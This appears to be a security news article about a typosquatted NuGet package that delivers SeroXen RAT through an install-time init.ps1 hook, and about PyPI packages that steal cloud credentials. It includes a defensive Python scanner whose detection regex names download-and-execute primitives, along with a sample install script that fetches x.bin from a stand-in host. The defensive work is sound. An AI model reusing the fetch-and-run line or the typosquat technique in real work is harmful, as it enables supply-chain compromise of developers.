Fake .NET Package on NuGet Delivers SeroXen RAT
A malicious package hosted on the NuGet package manager for the .NET Framework has been found delivering the remote access trojan known as SeroXen RAT. The package, named “Pathoschild.Stardew.Mod.Build.Config,” was published by a user named Disti. Its name differs from the legitimate “Pathoschild.Stardew.ModBuildConfig” package only by the insertion of two dots, a typosquat aimed at the software supply chain, according to Phylum, a firm specializing in software supply chain security.
While the authentic package has nearly 79,000 downloads to date, the counterfeit one has had its download count artificially inflated to over 100,000 since its release on October 6, 2023.
The user behind this suspicious package has published six other packages with a combined 2.1 million downloads. Four of these pose as libraries for cryptocurrency services such as Kraken, KuCoin, Solana, and Monero, but they too deliver SeroXen RAT.
The infection chain starts when the package is installed, through a ‘tools/init.ps1’ script. The script gains code execution without any visible warning, abusing a behavior JFrog disclosed in March 2023: NuGet’s install-time script hook lets a package author run arbitrary commands on the developer’s machine, a mechanism already known to be used for retrieving next-stage malware.
In the NuGet package analyzed by Phylum, the PowerShell script fetches a file named ‘x.bin’ from a remote server. Interestingly, ‘x.bin’ is a heavily obfuscated Windows Batch script, which in turn constructs and executes another PowerShell script that deploys SeroXen RAT.
SeroXen RAT is an off-the-shelf malware available for a meager $60, making it a readily accessible tool for cybercriminals. It operates as a fileless RAT, blending the functionalities of Quasar RAT, the r77 rootkit, and the Windows command-line tool NirCmd.
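Both weaknesses the article describes, a package id that collides with a trusted one after punctuation is ignored and a PowerShell install hook that downloads and runs remote content, can be checked before a .nupkg is ever installed. The following is an added example, not Phylum’s tooling or code from the article; the sample package it builds in memory is constructed for illustration, and the keyword list is an assumed starting point rather than a complete signature set.

```python
import io
import re
import zipfile
from typing import Optional

# Install-time PowerShell hooks that NuGet tooling (Visual Studio) can execute
# when a package is installed; init.ps1 is the one abused in the article.
INSTALL_HOOKS = ("tools/init.ps1", "tools/install.ps1", "tools/uninstall.ps1")

# Download-and-execute primitives; any hit in an install hook warrants review.
SUSPICIOUS = re.compile(
    r"invoke-webrequest|downloadfile|downloadstring|net\.webclient|"
    r"invoke-expression|\biex\b|start-process|frombase64string",
    re.IGNORECASE,
)

def normalize(package_id: str) -> str:
    """Collapse punctuation and case so 'Foo.Bar-Baz' and 'foobarbaz' collide."""
    return re.sub(r"[.\-_]", "", package_id).lower()

def looks_like_typosquat(candidate: str, trusted_ids) -> Optional[str]:
    """Return the trusted id that `candidate` collides with after
    normalization, or None if it is the genuine package or unrelated."""
    norm = normalize(candidate)
    for trusted in trusted_ids:
        if candidate != trusted and normalize(trusted) == norm:
            return trusted
    return None

def scan_nupkg(data: bytes) -> list:
    """Return (member, matched keyword) pairs for install hooks that contain
    download-and-execute primitives. A .nupkg is an ordinary zip archive."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for name in z.namelist():
            if name.lower() in INSTALL_HOOKS:
                text = z.read(name).decode("utf-8", errors="replace")
                findings += [(name, m.group(0)) for m in SUSPICIOUS.finditer(text)]
    return findings

def build_sample_nupkg() -> bytes:
    """Constructed sample package for the test; not the real malicious artifact."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("lib/net6.0/Dummy.dll", b"")
        z.writestr("tools/init.ps1",
                   "Invoke-WebRequest http://example.invalid/x.bin -OutFile $env:TEMP\\x.bin\n")
    return buf.getvalue()
```

Run against a real feed, `trusted_ids` would be the allow-list of package ids a project already depends on, and a hit from either function should block the install pending review.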
Phylum emphasized the critical significance of this discovery, stating, “The discovery of SeroXen RAT in NuGet packages only underscores how attackers continue to exploit open-source ecosystems and the developers that use them.”
This development comes on the heels of Phylum’s detection of seven malicious packages on the Python Package Index (PyPI) repository. These packages impersonate legitimate offerings from major cloud service providers like Aliyun, Amazon Web Services (AWS), and Tencent Cloud, clandestinely transmitting credentials to an obfuscated remote URL.
The malicious packages included tencent-cloud-python-sdk, python-alibabacloud-sdk-core, alibabacloud-oss2, python-alibabacloud-tea-openapi, aws-enumerate-iam, enumerate-iam-aws, and alisdkcore. The attacker capitalizes on a developer’s trust, subtly inserting a bit of malicious code designed to extract sensitive cloud credentials.
Furthermore, the attackers targeted Telegram via a deceptive package named telethon2, imitating telethon, a Python library for interacting with Telegram’s API. These counterfeit packages have mainly attracted downloads from the U.S., China, Singapore, Hong Kong, Russia, and France.
These incidents reflect the growing sophistication of attackers in infiltrating software supply chains, highlighting the necessity for robust security measures in open-source ecosystems.
Source: thehackernews.com